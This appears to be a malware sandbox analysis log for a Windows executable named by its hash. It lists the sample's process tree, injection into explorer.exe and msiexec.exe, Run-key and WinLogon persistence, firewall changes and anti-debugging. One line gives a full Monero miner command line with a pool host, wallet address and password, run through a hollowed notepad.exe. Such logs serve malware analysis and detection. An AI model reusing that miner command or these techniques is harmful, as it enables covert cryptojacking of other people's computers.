43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe PID 1928 wrote to memory of 1400 1928 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1280
-
C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"2⤵
- Drops startup file
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"3⤵
- Sets file execution options in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
PID:1484 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe4⤵
- Modifies firewall policy service
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:568
-
-
-
C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"3⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:940 -
C:\Windows\notepad.exe"C:\Windows\notepad.exe" -o pool.monero.hashvault.pro:5555:80 -u 48g2oLrkRG5JtnYA1pUukrYHgsu6aBqGTVxzZx6av6wvhBtgTHrKquWXMY2BJNnxs3aqj3U5RMnoZ6HaZYRMUouU8ke7kC4 -p trainwreck -v 0 -t 24⤵
- Suspicious use of AdjustPrivilegeToken
PID:1180
-
-
-
C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1400 -
C:\Windows\SysWOW64\msiexec.exeC:\Windows\SysWOW64\msiexec.exe4⤵
- Modifies WinLogon for persistence
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:560
-
-
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵PID:1248
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1556